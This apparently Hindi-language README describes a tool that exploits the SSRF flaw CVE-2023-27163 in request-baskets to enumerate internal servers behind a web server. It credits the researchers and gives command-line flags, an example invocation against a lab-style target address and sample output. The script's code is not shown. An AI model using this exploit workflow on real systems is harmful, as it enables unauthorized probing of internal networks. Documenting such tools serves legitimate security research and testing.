
वेबसर्वर के पीछे वेबसर्वर SSRF CVE-2023-27163 की गणना में सहायता करने के लिए
@beet1e(https://github.com/b33t1e) शंघाई जिओ टोंग विश्वविद्यालय से और @chenlibo147 , @houqinsheng, [email protected] शेडोंग विश्वविद्यालय से को धन्यवाद।
कृपया SSRF भेद्यता (CVE-2023-27163) के बारे में गहन जानकारी के लिए https://notes.sjtu.edu.cn/s/MUUhEymt7# देखें।
यह कोड request-baskets में SSRF का उपयोग करके आंतरिक सर्वर की गणना करने के लिए है।
यदि कुछ गलत लगता है या कोई समायोजन किया जाना चाहिए तो कृपया मुझे [email protected] पर सूचित करने में संकोच न करें।
धन्यवाद।
उपयोग। -w - Wordlist -target - बास्केट जोड़ने के लिए request basket api url के साथ लक्ष्य url -dynamic - आंतरिक सर्वर देखने के लिए आप जो लिंक बनाना चाहते हैं उसका नाम -internal_target - आंतरिक लक्ष्य url -ms - मिलीसेकंड
Ex: -w raft-test.txt -target "http://10.10.10.5:55555/api/baskets/" -dynamic "test" -internal_target "http://120.0.0.1/" -ms 500
Stdout इस प्रकार दिखना चाहिए:
पेज लिंक: web
सामग्री लंबाई: 2394
URL तक पहुँचने का अनुरोध: http://10.10.10.5:55555/test48